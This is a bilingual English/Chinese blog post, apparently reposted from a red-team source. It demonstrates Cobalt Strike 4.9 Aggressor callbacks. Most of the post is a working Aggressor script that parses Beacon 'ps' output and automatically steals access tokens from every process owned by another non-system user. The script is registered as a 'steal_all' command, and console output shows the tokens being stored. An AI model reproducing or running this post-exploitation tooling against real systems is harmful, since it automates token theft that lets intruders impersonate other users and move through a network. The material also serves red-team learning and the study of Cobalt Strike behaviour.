Cobalt Strike Aggressor Callbacks

渗透技巧 7个月前 admin

93 0 0

The Cobalt Strike 4.9 release introduced support for registering Aggressor callbacks for several functions including bexecute_assembly, bpowerpick, and binline_execute. Prior to this feature, there was no practical way of tasking Beacon and then performing further actions based on the output (other than reading it on the console and then manually issuing more commands). To demonstrate the usefulness of these new callbacks, let’s consider a scenario involving the token store. Until now, we have had to either issue a ps command to list the processes running on a system and then type or copy/paste the PID of each one into the token-store command.
Cobalt Strike 4.9 版本引入了对注册多个函数的 Aggressor 回调的支持，包括 bexecute_assembly 、 bpowerpick 和 binline_execute 。在此功能之前，没有实用的方法可以分配 Beacon 的任务，然后根据输出执行进一步的操作（除了在控制台上读取它，然后手动发出更多命令）.为了演示这些新回调的有用性，让我们考虑一个涉及令牌存储的方案。到目前为止，我们不得不发出一个 ps 命令来列出系统上运行的进程，然后将每个进程的 PID 键入或复制/粘贴到命令中 token-store 。

beacon> ps

PID     PPID    Name     Arch  Session  User
---     ----    ----     ----  -------  ----
179184  179028  cmd.exe  x64   2        DESKTOP-1U6AHIU\test_user
128392  181212  cmd.exe  x64   2        DESKTOP-1U6AHIU\test_user2

beacon> token-store steal 179184,128392 11
[*] Stored Tokens

 ID   PID   User
 --   ---   ----
 0    179184 DESKTOP-1U6AHIU\test_user
 1    128392 DESKTOP-1U6AHIU\test_user2

Or use the process explorer GUI to go through and highlight each process individually.
或者使用进程资源管理器 GUI 单独浏览并突出显示每个进程。

By utilising the callbacks, we can execute the bps function in Aggressor, parse the output and automatically pass the target PIDs to btoken_store_steal. A callback can be provided directly in the bps function, so instead of bps($1), it can be bps($1, &ps_cb). The callback function will receive the ID of the Beacon and the result of bps. Here, I just perform some regex on the output to extract the process name, PID, arch, and username. Each PID that matches my criteria is added to a list.
通过利用回调，我们可以在 Aggressor 中执行 bps 函数，解析输出并自动将目标 PID 传递给 btoken_store_steal .回调可以直接在 bps 函数中提供，因此可以 bps($1, &ps_cb) 代替 bps($1) 。回调函数将接收信标的 ID 和的结果 bps 。在这里，我只是对输出执行一些正则表达式来提取进程名称、PID、arch 和用户名。每个符合我的条件的 PID 都会添加到列表中。

sub ps_cb { 
    # $1 = beacon ID
    # $2 = results

    local('$current_user $stolen $targets');

    # get our current username
    # but strip off the * when elevated
    $current_user = replace(binfo($1, "user"), '(\s.*)', "");

    # a list to hold the names
    # of users already stolen from
    @stolen = @();

    # a list of PIDs to steal from
    @targets = @();

    # loop over every process
    # [name] [ppid] [pid] [arch] [user] [session]
    while ($2 hasmatch '(.*.exe)\t[0-9]*\t([0-9]*)\t(x64|x86)\t(.*)\t\d')
    {
        local('$process $pid $arch $user');

        $process = matched()[0];
        $pid = matched()[1];
        $arch = matched()[2];
        $user = matched()[3];

        # if the process belongs to a different user
        if ($user !ismatch ".*\\ $+ $current_user $+ ")
        {
            # ignore system accounts
            if ($user ismatch 'NT(\s)AUTHORITY.*') {
                continue;
            }

            # ignore if already stolen from this user
            if ($user in @stolen) {
                continue;
            }

            ## log to the console
            blog2($1, "Adding  $+ $process $+  ( $+ $pid $+ | $+ $arch $+ ) to list of tokens to steal from");

            # add to lists
            push(@stolen, $user);
            push(@targets, $pid);
        }
    }

    # attempt to steal tokens and add to store
    btoken_store_steal($1, @targets, 11);
}

The call to bps can be registered as a new Beacon command.
调用可以 bps 注册为新的信标命令。

alias steal_all {
    bps($1, &ps_cb);
}

beacon_command_register(
   "steal_all", 
   "Steal access tokens from all processes", 
   "Synopsis: steal_all\n\nSteal access tokens from all processes not owned by the current user.\nExcludes processes owned by NT AUTHORITY\\*");

Example usage: 用法示例：

beacon> steal_all
[*] Adding cmd.exe (179184|x64) to list of tokens to steal from
[*] Adding cmd.exe (128392|x64) to list of tokens to steal from
[*] Tasked beacon to steal token from PID(s) 179184,128392 with OpenProcessToken access mask 11

[*] Stored Tokens

 ID   PID   User
 --   ---   ----
 0    179184 DESKTOP-1U6AHIU\test_user
 1    128392 DESKTOP-1U6AHIU\test_user2

This was a simple example of how these new callbacks can drive additional automation within Aggressor scripts. The Cobalt Strike team have also published several examples to GitHub, which you should check out for additional inspiration.
这是一个简单的例子，说明这些新的回调如何在 Aggressor 脚本中推动额外的自动化。Cobalt Strike团队还在GitHub上发布了几个例子，你应该看看这些例子以获得额外的灵感。